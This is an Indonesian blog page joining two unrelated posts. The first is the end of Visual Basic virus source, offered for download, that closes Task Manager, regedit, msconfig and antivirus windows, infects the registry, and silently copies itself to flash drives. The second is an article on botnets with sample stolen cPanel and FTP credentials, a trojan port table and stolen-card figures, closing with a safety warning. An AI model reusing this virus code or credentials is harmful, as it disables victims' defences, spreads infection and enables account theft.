obj.Visible = True
Timer1.Enabled = True
Timer2.Enabled = False
End If
End Sub
Private Sub Timer3_Timer()
On Error Resume Next
‘menutup aplikasi yang berbahaya bagi virus
FWnd = FindWindow(“#32770″, “RUN”) ‘jendela run
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“#32770″, “System Configuration Utility”) ‘msconfig
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“#32770″, “Windows Task Manager”) ‘task manager
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“#32770″, “Avira AntiVir Personal – Free Antivirus”) ‘Avira Antivir
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“#32770″, “AntiVir Guard: Attention, Detection!”) ‘Avira Antivir
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“RegEdit_RegEdit”, vbNullString) ‘regedit.exe
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“TMainForm”, vbNullString) ‘aplikasi buatan Delphi (Antivirus PCMAV yang versi lama dapat ditutup tetapi versi yang baru tidak bisa dihentikan) <:d
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(“TApplication”, vbNullString) ‘aplikasi buatan Delphi
SendMessage FWnd, WM_CLOSE, 0&, 0&
End Sub
Private Sub Timer4_Timer()
‘cari flashdisk
On Error Resume Next
For i = 0 To Drive1.ListCount – 1
If GetDriveType(Drive1.List(i)) = 2 And Left(Drive1.List(i), 1) <> “a” Then
FlashDisk = (Drive1.List(i))
Timer4.Enabled = False ‘agar lampu flashdisk tdk berkedip-kedip terlalu lama, sehingga tdk mencurigakan si empunya flashdisk
Exit For
End If
Next
GandaKeFlashDisk ‘
End Sub
Private Sub Timer5_Timer()
On Error Resume Next
InfeksiRegistry
‘Mungkin salah satu virus dihapus shg perlu selalu menggandakan diri
GandakefolderIstimewa
‘menyalakan timer 4
If GetDriveType(Drive1.List(i)) = 2 And Left(Drive1.List(i), 1) <> “a” Then
Timer4.Enabled = True
End If
End Sub
Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
Cancel = 1
End Sub
Private Sub Form_Unload(Cancel As Integer)
Cancel = 1
End Sub
Silahkan Download Project Di Download/Upload Gratis Join 4Shared Now!, Tetapi sebelumnya jika anda berkenan berikan rating pada artikel ini dengan mengklik tanda bintang di bawah ini, agar saya mengetahui artikel yang paling menarik untuk penulisan selanjutnya. Terimakasih.

Dangerous – BotNet

Pastinya semua sudah tau apa itu BotNet! Klo belum tau ni gw kasi clue dah..
BotNet merupakan sebuah zombie penggerak system yang bisa digunakan untuk keperluan DDOS, Logging, Recover, dsb.

Dan untuk saat ini, BinusHacker Team mencoba dan meneliti beberapa project BotNet yang bisa sangat berbahaya. BotNet terdiri dari masing² platform yang harus secompatible mungkin untuk bisa berjalan dengan baik pada masing² OS. Misalkan untuk Windows dan Unix* yang sekarang banyak digunakan.

BotNet Trojan

Kalau sebuah system sudah terkena BotNet Trojan, maka komputer tersebut akan mengirimkan beberapa Informasi log dari system. Dimana kita juga bisa mengontrol komputer target. Apabila dalam sebuah Windows Server maka kita bisa menggunakan Remote Desktop untuk bisa mengaksesnya. Dan apabila pada unix maka kita bisa mengambil logging password root. Kemudian kita bisa menggunakan remote login dari hak akses root.
BotNet biasanya dibangun menggunakan MBR (master boot record). Sebuah rootkit yang dilaksanakan pada waktu boot, sebelum sistem operasi dibuka. Setelah mesin terinfeksi, maka hasil panen malware dan upload data dalam 20 menit akan dikirimkan. Data yang dicuri termasuk e-mail account, Windows / Unix password, dan FTP credentials POP / SMTP account, Control Panel, dll.
Adapun contoh hasil dari traced pengiriman email dari BotNet:

Hasil dari informasi akan diterima dan direport dalam Computer Server Attacker, sehingga Informasi yang masuk bisa disimpan dan dimanipulasi.

Bagaimana hal tersebut bisa terjadi, buat semua orang berhati hatilah karena saat ini begitu banyak cara untuk mendapatkan Informasi. Dan yang paling berbahaya apabila ada Account Privacy anda ada didalam sana. Misalkan Paypal, LR, Atau Bank Account Yang ada di Email Anda. Sungguh sangat berbahaya!
Berikut ini hanyalah contoh sebuah email account yg bisa kita ambil, dimana disana kita bisa backdoor, recover password dan sebagainya, bisa anda bayangkan sendiri:

Contoh Control Panel Information sebuah website yang bisa didapat:
1
2
3
4
5
6
7
8
9
10
11
12
13
    Cpanel Username: fh_609986
    Cpanel Password: loft1234
    FTP Server : <span class="linkification-ext">ftp.***host.org</span>
    FTP Login : fh_609986
    FTP Password : loft1234
    MySQL Database Name: MUST CREATE IN CPANEL
    MySQL Username : fh_609986
    MySQL Password : loft1234
    MySQL Server: SEE THE CPANEL
    POP3 Server : mail.***host.org
    POP3 Username : fh_609986
Contoh FTP Account yang diterima dari BotNet Zombie sebagai berikut:
1
2
3
4
5
6
7
8
FTP Server:     ***.**host.com
FTP Login:     ***.**host.com
FTP Password:     l1nuxus3r
E-mail Account Information:
E-mail accounts that you add:
POP3/IMAP Host Address: (depends on hostname you use for
the e-mail account, i.e your domain or subdomain).
SMTP Host Address: (check if you have this option enabled)
Berikut logging aktifitas dalam system ketika DDOS berjalan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
A frequent visitor sent me the following table:
Port Protocol Keyword D e s c r i p t i o n
1 tcp tcpmux TCP Port Multiplexer
1 udp SocketsdesTroie [trojan] Sockets Troie
1 udp tcpmux TCP Port Multiplexer
2 tcp compressnet Management Utility
2 tcp Death [trojan] Death
2 udp compressnet Management Utility
3 tcp compressnet Compression Process
3 udp compressnet Compression Process
5 tcp rje Remote Job Entry
5 udp rje Remote Job Entry
7 tcp echo Echo
9 tcp discard Discard
11 tcp systat Active Users
11 udp systat Active Users
13 tcp daytime Daytime
13 udp daytime Daytime
15 tcp netstat Netstat
15 tcp B2 [trojan] B2
17 tcp qo TDQuote of the Day
17 udp qo TDQuote of the Day
18 tcp msp Message Send Protocol
18 udp msp Message Send Protocol
19 tcp chargen Character Generator
19 udp chargen Character Generator
20 tcp ftp-data File Transfer
20 udp ftp-data File Transfer
20 tcp SennaSpyFTPserver [trojan] Senna Spy FTP
21 tcp ftp File Transfer [Control]
21 udp ftp File Transfer [Control]
21 tcp BackConstruction [trojan] Back Construction
21 tcp BladeRunner [trojan] BladeRunner
21 tcp CCInvader [trojan] CC Invader
21 tcp DarkFTP [trojan] Dark FTP
21 tcp DolyTrojan [trojan] Doly Trojan
21 tcp Fore [trojan] Fore
21 tcp InvisibleFTP [trojan] Invisible FTP
21 tcp Juggernaut42 [trojan] Juggernaut 42
21 tcp Larva [trojan] Larva
21 tcp MotIvFTP [trojan] MotIv FTP
21 tcp NetAdministrator [trojan] Net Administrator
Yang Paling Berbahaya, Informasi Yang Diperoleh Dari BotNet adalah terdapat dan bisa di extractnya 1660 unit kartu kredit dan kartu debit dari kumpulan data yang diterima. Geolocation melalui alamat IP, dipastikan bahwa 49% dari nomor kartu berasal dari korban di AS, 12% dari Italia, dan 8% dari Spanyol, dengan 40 negara-negara lain. Yang paling umum termasuk kartu Visa (1056), MasterCard (447), American Express (81), Maestro (36), dan yang lainnya termasuk Bank Account, dsb (24). Yang menarik disana adalah bahwa 80% dari kartu kredit tersebut adalah kartu yang terdapat dalam database yang biasanya digunakan untuk processing online order.
Jadi jika anda memiliki komputer dan berselancar di internet, berhati²lah dengan spyware, malware, dan BotNet zombie yang sangat berbahaya bagi Privacy Anda terutama menyangkut Data diri, Email, Login, Password, Username, dsb. Sebaiknya anda melakukan check log + memperhatikan proses yang sedang berjalan pada komputer Anda. Jika ada yang mencurigakan segera beri tindakan. Jika anda sudah mendapatkankan info ini, diharapkan anda bisa share ke yang lainnya dan anda bisa menghindari resiko yang akan timbul.
===================[ EOF ]=====================
Semoga Bermanfaat..
Enjoy & Eat It! Heheh :)
 
© Copyright 2010-2011 Media Pengetahuan All Rights Reserved.
Template Design by Herdiansyah Hamzah | Published by Borneo Templates | Powered by Blogger.com.